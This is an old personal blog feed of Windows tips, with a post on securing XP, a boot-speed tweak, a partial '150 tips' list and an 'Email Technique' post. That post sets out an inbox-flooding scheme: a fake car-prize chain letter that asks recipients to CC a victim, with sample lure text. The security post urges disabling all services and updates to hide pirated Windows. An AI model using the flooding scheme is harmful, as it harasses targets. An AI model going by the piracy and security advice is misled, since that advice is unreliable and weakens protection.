&lt;/span&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;Do not use anything related to yourself as a password, because other people could easily guess it. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;"&gt;4.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;"&gt;     &lt;b&gt;WELCOME SCREEN &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;The welcome screen usually displays the list of user names on the computer. Do not give admin-level rights to anyone but yourself! &lt;/span&gt;&lt;span style="line-height: 200%;"&gt;Remember!! Trust Nobody! &lt;/span&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;Also make sure your own username is password-protected. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;"&gt;5.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;"&gt;     &lt;b&gt;DISABLE UNNEEDED SERVICES &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;Leaving the default services enabled can open security holes. Right-click &lt;b&gt;My Computer&lt;/b&gt;, click &lt;b&gt;Manage&lt;/b&gt;, then go to &lt;b&gt;Services and Applications&lt;/b&gt; and select &lt;b&gt;Services&lt;/b&gt;. 
Disable all the services in this section. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;"&gt;6.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;"&gt;     &lt;b&gt;DISABLE ERROR REPORTING AND AUTOMATIC UPDATES &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;Windows XP has an Error Reporting feature whose reports are sent to Microsoft. &lt;/span&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;If you use a pirated product, Microsoft will know and will cut off the services it provides. &lt;/span&gt;&lt;span style="line-height: 200%;"&gt;It is therefore a good idea to disable Error Reporting so that Microsoft does not find out that your Windows is pirated. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;Automatic Updates is another feature that connects our computer directly to Microsoft's site, and Microsoft will then automatically know whether our Windows XP is a legal or a pirated product. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="line-height: 200%;"&gt;To disable Error Reporting&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="line-height: 200%;"&gt;: Go to &lt;b&gt;Control panel&lt;/b&gt;, then open &lt;b&gt;Performance and Maintenance&lt;/b&gt; -&gt; &lt;b&gt;System&lt;/b&gt; -&gt; &lt;b&gt;advanced&lt;/b&gt; -&gt; &lt;b&gt;Error Reporting&lt;/b&gt; and disable everything. 
&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="line-height: 200%;"&gt;To disable Automatic Updates&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="line-height: 200%;"&gt;: Go to &lt;b&gt;Control panel&lt;/b&gt;, then open &lt;b&gt;Performance and Maintenance&lt;/b&gt; -&gt; &lt;b&gt;System&lt;/b&gt; -&gt; &lt;b&gt;automatic updates &lt;/b&gt;and disable updates. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;After you have done both, try carrying out step 5 to disable the &lt;b&gt;Error Reporting&lt;/b&gt; and &lt;b&gt;Automatic updates&lt;/b&gt; services. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;"&gt;7.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;"&gt;     &lt;b&gt;FIREWALL &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;An open port can serve as an entry point for &lt;i&gt;virtual creatures&lt;/i&gt; you do not want. &lt;/span&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;I have heard many times of computers being broken into easily through an open port. "&lt;i&gt;Well, if it's obvious that attacks come through open ports, why not just close all the ports?&lt;/i&gt;" Hehehe.. &lt;/span&gt;&lt;span style="line-height: 200%;"&gt;A port is like the door of a house. 
If we removed every door of the house and walled everything up, your belongings might be safe from thieves, but how would you get out of the house with no door? The same applies to your computer: you might be safe from outside attacks, but you would have no way to make outbound connections. &lt;/span&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;The solution? Enable your firewall to control the open ports. You can use &lt;b&gt;Zone Alarm&lt;/b&gt; and the like for the security of your computer. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;8.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;     &lt;b&gt;ANTIVIRUS &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;Although we can avoid viruses, trojans and spyware bare-handed (see the tips and tricks for staying safe from viruses without an antivirus in an earlier article), for convenience and better-assured security we need to install an antivirus. Remember to choose the right antivirus wisely and to update to the latest virus definitions diligently. 
&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;9.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;     &lt;b&gt;DELETE "JUNK" FILES AND YOUR TRACES &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;span style="" lang="DE"&gt;Every time you do something, whether browsing a site or opening a file, the computer records your traces, creating temporary files and shortcuts so that you can later open that file or site more quickly. That surely threatens your privacy, doesn't it? &lt;/span&gt;&lt;span style=""&gt;And of course, the accumulated trace files eat up free space on your hard disk. Use a trace-cleaning and junk-file-cleaning application to deal with this. 
Pick the application yourself on the Utility page (in the member area of www.spyrozone.tk).&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/1007674296620538799/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=1007674296620538799' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/1007674296620538799'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/1007674296620538799'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/amankan-windows.html' title='Amankan windows'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-7528475467448809192</id><published>2008-03-25T03:29:00.000-07:00</published><updated>2008-03-25T05:47:34.150-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Blog'/><title type='text'>Promoting your blog</title><content type='html'>This is for beginners in the blogging world. After you create a blog, it is a good idea to promote it. The aim is for your blog to get lots of visitors, which is what we all want for our blogs. 
So what are you waiting for? Register your blog right away so it can be promoted. Here are a few links for promotion:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.kampungblog.com/"&gt;&lt;img src="http://www.kampungblog.com/button.php?u=denie" alt="KampungBlog.com - Kumpulan Blog-Blog Indonesia" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://technorati.com/claim/j9775fd9gc"&gt;Technorati.com&lt;/a&gt;</content><link rel='related' href='http://technorati.com/claim/j9775fd9gc' title='Berpromosi blog'/><link rel='enclosure' type='Blog' href='http://defidz.blogspot.com' length='0'/><link rel='enclosure' type='Blog' href='http://defidz.tblog.com' length='0'/><link rel='enclosure' type='Website' href='http://www.kampungblog.com/button.php?u=denie' length='0'/><link rel='enclosure' type='Website' href='http://www.no-minimum.com/pages/index.php?refid=piratesnofear' length='0'/><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/7528475467448809192/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=7528475467448809192' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7528475467448809192'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7528475467448809192'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/berpromosi-blog.html' title='Berpromosi blog'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' 
height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-4381975835577750623</id><published>2008-03-24T21:42:00.000-07:00</published><updated>2008-03-25T06:00:16.347-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Email Technique</title><content type='html'>&lt;p class="MsoNormal"&gt;After quite a while, I only recently noticed an interesting concept when re-reading an email that had been sent to me. I have forgotten the exact contents, but in essence it was a forwarded email containing an attractive offer if I forwarded it on to my friends while always adding a CC (carbon copy) to a particular email address. &lt;/p&gt;  &lt;span style=";font-family:&amp;quot;;font-size:12;"  &gt;&lt;br /&gt;In this case the CC address is the target of the email flooding. With this method the chance of the email being classified as SPAM is small, because it is sent from valid (legitimate) email addresses, and of course it fills the target's inbox.&lt;br /&gt;Yes, this is a technique used by an attacker (A) to flood the INBOX of the target (B).&lt;br /&gt;&lt;br /&gt;A story that illustrates it might go as follows:&lt;br /&gt;A is the head of the Marketing division of Company XYZ who has just been fired after being framed by B (A's boss, the real embezzler) on a charge of embezzling 2 billion.&lt;br /&gt;So A racks his brain for a way to take revenge on B. 
The management of Company XYZ made a mistake (lucky for A) by not deleting A's email account right away, so he went to an internet cafe, logged in to Company XYZ's webmail and started typing.&lt;br /&gt;In short, A sent an email to 10 of his friends that read roughly as follows:&lt;br /&gt;&lt;br /&gt;Hello Friend,&lt;br /&gt;&lt;br /&gt;I am the head of the Marketing division of Company XYZ.&lt;br /&gt;To celebrate our 10th anniversary, our company is holding a contest with a prize of 1 Ford Focus car for anyone who sends/forwards this email to other friends while including a CC: to B's email address. We need this to record who forwarded it and how many forwards were sent. The person who forwards the most will receive a confirmation email from us no later than 1 week after the contest closes.&lt;br /&gt;&lt;br /&gt;...&lt;br /&gt;bla bla bla&lt;br /&gt;...&lt;br /&gt;~plus an attachment so that the email size is 100Kb&lt;br /&gt;&lt;br /&gt;Who wouldn't be tempted by the lure of a Ford Focus? Especially when it takes only a few clicks and keystrokes. As a result, A's 10 friends promptly forwarded it to their contact lists. 
Each of them forwarded it to at least 10 other friends&lt;br /&gt;&lt;br /&gt;A --&gt; A'  --&gt; A'' --&gt; A'''--&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |        |-&gt; A''''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |         |-&gt; A'''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |&lt;br /&gt;  |-&gt; A'  --&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |         |-&gt; A''&lt;br /&gt;  |-&gt; A'&lt;br /&gt;  |-&gt; A'&lt;br /&gt;  |-&gt; A'&lt;br /&gt;  |-&gt; A'&lt;br /&gt;  |-&gt; A'&lt;br /&gt;  |-&gt; A'&lt;br /&gt;  |-&gt; A'&lt;br /&gt;  |-&gt; A'&lt;br /&gt;&lt;br /&gt;A rough count:&lt;br /&gt;     A' -&gt; A'' = 10 x 1 = 10 --&gt; CC to B's INBOX&lt;br /&gt;     A'' -&gt; A''' = 10 x 10 = 100 --&gt; CC to B's INBOX&lt;br /&gt;     A''' -&gt; A'''' = 10 x 10 x 10 = 1000 --&gt; CC to B's INBOX&lt;br /&gt;                   &lt;br /&gt;At this point we can calculate:&lt;br /&gt;Total emails CC'd to B = 10+100+1000=1110&lt;br /&gt;Total size CC'd to B = 1110x100Kb= 111,000Kb&lt;br /&gt;                          = 111Mb&lt;br /&gt;&lt;br /&gt;111 Mb of (junk) email lands in B's INBOX!!&lt;br /&gt;And that is before each A'''' forwards it to another 10 friends, and so on. Perhaps not just 10 friends: doesn't forwarding to more people raise the chance of a Ford Focus ending up in our garage? OK, I have 100 contacts, from elementary, junior high and high school friends to college friends and office colleagues, and I will surely forward it to all of them. Say the success rate (those who forward it again) is 25%; then 25 of them will do the same to their contact lists. And BOOM!!&lt;br /&gt;&lt;br /&gt;If B's mail server capacity is only 100MB, Company XYZ is ruined, because its mailbox is filled with the junk from A's revenge. Since all incoming transactions arrive only through B's email, incoming mail will soon BOUNCE (be returned to the sender) because the mailbox is full (overloaded). 
Within just a few months Company XYZ goes out of business because there are no transactions at all.&lt;br /&gt;&lt;br /&gt;The lesson we can take from the story above is not to be easily fooled by emails that dangle money, shopping discounts, car prizes and so on, which are basically just an attempt to flood the mailbox of someone who has been targeted.&lt;br /&gt;&lt;br /&gt;The author is not responsible for anything that arises from this article, as it is intended only for learning about email etiquette.&lt;br /&gt;Regards.&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/4381975835577750623/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=4381975835577750623' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4381975835577750623'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4381975835577750623'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/email-technique.html' title='Email Technique'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' 
src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-7832032910134057438</id><published>2008-03-24T21:35:00.000-07:00</published><updated>2008-03-25T13:50:00.737-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>FINDING AND REPAIRING DAMAGED SYSTEM FILES</title><content type='html'>&lt;p class="MsoNormal" style="margin: 0cm 6.75pt 0.0001pt; text-align: justify; line-height: 200%;"&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  lang="DE" &gt;Does your computer often hang, or do applications often fail to run properly? &lt;/span&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  &gt;One cause may be damaged system files in your Windows installation. &lt;/span&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  lang="DE" &gt;Here are the steps for finding out whether system files are damaged. 
&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 6.75pt 0.0001pt 42.75pt; text-align: justify; text-indent: -18pt; line-height: 200%;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  &gt;&lt;span style=""&gt;1.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  &gt;Click [start][programs][accessories][system tools][system information] &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 6.75pt 0.0001pt 42.75pt; text-align: justify; text-indent: -18pt; line-height: 200%;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  &gt;&lt;span style=""&gt;2.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  &gt;Click the [tools][system file checker] menu, then click the [scan for altered files] option, then click [start]. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 6.75pt 0.0001pt 42.75pt; text-align: justify; text-indent: -18pt; line-height: 200%;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  &gt;&lt;span style=""&gt;3.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  lang="DE" &gt;Wait a moment until the scan finishes. 
If damaged system files are found, you will be guided through repairing them.&lt;/span&gt;&lt;span style="line-height: 200%;font-family:&amp;quot;;font-size:9;"  &gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/7832032910134057438/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=7832032910134057438' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7832032910134057438'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7832032910134057438'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/mencari-dan-memperbaiki-file-system.html' title='MENCARI DAN MEMPERBAIKI FILE SYSTEM YANG RUSAK'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-8461961642322794057</id><published>2008-03-24T21:29:00.000-07:00</published><updated>2008-03-24T21:32:18.662-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Speeding up Win-XP boot</title><content type='html'>&lt;span style="font-size: 9.5pt; font-family: &amp;quot;Times New Roman&amp;quot;; color: rgb(51, 51, 
51);"&gt;When I first found this tutorial I was curious about the result, and when I tried it, it turned out to be pretty good. After all... it does get annoying waiting for a login page that takes ages to go away. Argh&lt;br /&gt;&lt;br /&gt;Just follow these steps:&lt;br /&gt;&lt;br /&gt;1. Open Notepad (C:\WINDOWS\NOTEPAD.exe).&lt;br /&gt;2. Type: "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes), then save it with the file name "ntosboot.bat" in C:\.&lt;br /&gt;&lt;br /&gt;3. From the START menu, choose "Run..." and type "gpedit.msc".&lt;br /&gt;&lt;br /&gt;4. When the Group Policy window appears, in the left pane under Computer Configuration double-click Windows Settings, then click Scripts (Startup/Shutdown). Then, in the right pane, double-click "Shutdown".&lt;br /&gt;&lt;br /&gt;5. In the Shutdown Properties dialog, click "Add...", then "Browse..." at the "Script Name:" box. Locate the file saved earlier at "C:\ntosboot.bat", click Open -&gt; OK -&gt; Apply -&gt; OK again and exit.&lt;br /&gt;&lt;br /&gt;6. From the START menu, choose "Run..." and type "devmgmt.msc".&lt;br /&gt;&lt;br /&gt;7. Double-click "IDE ATA/ATAPI controllers".&lt;br /&gt;&lt;br /&gt;8. Right-click "Primary IDE Channel" and choose "Properties".&lt;br /&gt;&lt;br /&gt;9. When the "Primary IDE Channel Properties" dialog appears, switch to the "Advanced Settings" tab. Under "Device Type" in the "Device 1" section, change "Auto Detection" to "None", then click OK.&lt;br /&gt;&lt;br /&gt;10. Right-click "Secondary IDE Channel", choose "Properties" and repeat step 9.&lt;br /&gt;&lt;br /&gt;11. 
Reboot/restart your computer.&lt;br /&gt; &lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt; &lt;!--[endif]--&gt;&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/8461961642322794057/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=8461961642322794057' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8461961642322794057'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8461961642322794057'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/mempercepat-booting-win-xp.html' title='Mempercepat booting Win-XP'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-7315007311994683873</id><published>2008-03-24T21:12:00.000-07:00</published><updated>2008-03-25T05:59:53.535-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>150 basic Windows tips and tricks</title><content type='html'>150 basic Windows tips and tricks&lt;br /&gt;&lt;br /&gt;After installing Windows and the other applications you need on your computer, there are several things you should do. 
Among them are a few things to speed up the computer and make it easier to work with. For example, setting the computer to restart faster, revealing hidden menus, using shortcuts for quicker access, and so on.&lt;br /&gt;All of the above are just a small part of the basic Windows tips and tricks we present below. We have combined all the tips and tricks here into 150 steps that are easy and safe to carry out. These 150 tips and tricks, including several easy step-by-step guides, will make your computer more comfortable to work on. And, in the end, your productivity at the computer will grow.&lt;br /&gt;A comfortable computer alone is not enough without improved security. This matters because connecting to a network, to the Internet or to other computers always carries some risk, from the spread of viruses to our data being taken by unauthorized people. For that reason we also include some basic tips for improving Windows security.&lt;br /&gt;Some of the tips, tricks and step-by-step guides in this article rely on particular programs that can be downloaded from various sites on the Internet. To make things easier for you, as usual all the programs mentioned in this article are included on the PC Media CD. Naturally, all of the programs have been tested in the PC Media labs.&lt;br /&gt;Most of the program installers in this article come from Microsoft's official site, so it is unlikely that these programs will cause errors on your PC. So don't hesitate: read on for basic Windows tips and tricks that are rarely revealed!&lt;br /&gt;Easy and Enjoyable Windows Installation&lt;br /&gt;01. Back up the registry before editing it. To do so, click Start|Run and type regedit. When the registry window appears, choose File|Export. 
Under Export range, select All, specify a file name, and finish by clicking the Save button.&lt;br /&gt;02. Many programs are actually installed with Windows but are not active. To activate them, go to Control Panel|Add/Remove Windows Component and tick the programs that are not yet active.&lt;br /&gt;03. Before installing a new program or making system-wide changes to Windows settings, it is best to create a Restore Point manually first. To do so, click Start|All Programs|Accessories|System Tools|System Restore and click Create a restore point.&lt;br /&gt;04. If you decide to install a Windows Update that you previously declined, go to Control Panel|System, select the Automatic Updates tab and click Restore Declined Updates.&lt;br /&gt;05. To make Windows Update run the way you need, configure it first. Open System in Control Panel and click the Automatic Updates tab. Enable or disable the option Keep my computer up to date.&lt;br /&gt;06. If you don't have a bootable CD, don't worry. Microsoft provides a free tool for creating boot floppies at http://support.microsoft.com/?kbid=310994.&lt;br /&gt;07. If Windows installation suddenly stalls, turn off the computer and remove add-in cards, for example the sound card. Reinstall, and refit the card after installation finishes.&lt;br /&gt;08. To add System Administration Tools to the Start Menu, right-click Start|Properties. Go to the Start Menu tab, click Customize, then open the Advanced tab. Scroll down and tick the option Display on the All Programs and the Start Menu.&lt;br /&gt;09. To install the Backup Utility on Windows XP Home Edition, look for the file ntbackup.msi in the directory \valueadd\msft\ntbackup\ on the Windows XP installation CD. Run the file and follow the steps.&lt;br /&gt;10. Windows XP automatically highlights every newly installed program. 
To turn this off, right-click Start|Properties. Go to the Start Menu tab|Customize, then click the Advanced tab and untick the option Highlight newly installed program.&lt;br /&gt;11. For the best movie or game display on your computer, make sure the latest DirectX is properly installed. See the latest version at www.microsoft.com/windows/directx.&lt;br /&gt;12. Sometimes the hardware you want to install does not support Plug-and-Play. In that case, use the Add Hardware Wizard in Control Panel|System|Hardware to detect it.&lt;br /&gt;--&gt; TOP TIPS! Speeding Up the Computer&lt;br /&gt;13. It actually takes no more than 2 minutes to get into Windows after the computer is switched on. Yet sometimes it feels very long. To speed up Windows loading, there are several things you can do: for example, reduce the number of icons on the desktop and avoid wallpaper that uses a lot of memory. Replace the wallpaper with a plain coloured background, and use the Desktop Cleanup Wizard, which you can find by right-clicking the desktop, to clear out icons. Also remember to run defrag regularly.&lt;br /&gt;If you often add or remove programs on your computer, clean the registry regularly. Use a helper tool such as Registry Mechanic from www.winguides.com. Unfortunately, the trial version of this program can only repair 6 sections.&lt;br /&gt;Another step is to remove programs that load automatically when Windows starts; only the ones you don't need, of course. Do this by deleting the contents of the Startup folder and opening msconfig via Start|Run.&lt;br /&gt;14. Use the File and Transfer Setting Wizard to move files and settings to a new computer. Click Start|All Programs|Accessories|System Tools, then run the File and Transfer Setting Wizard.&lt;br /&gt;15. 
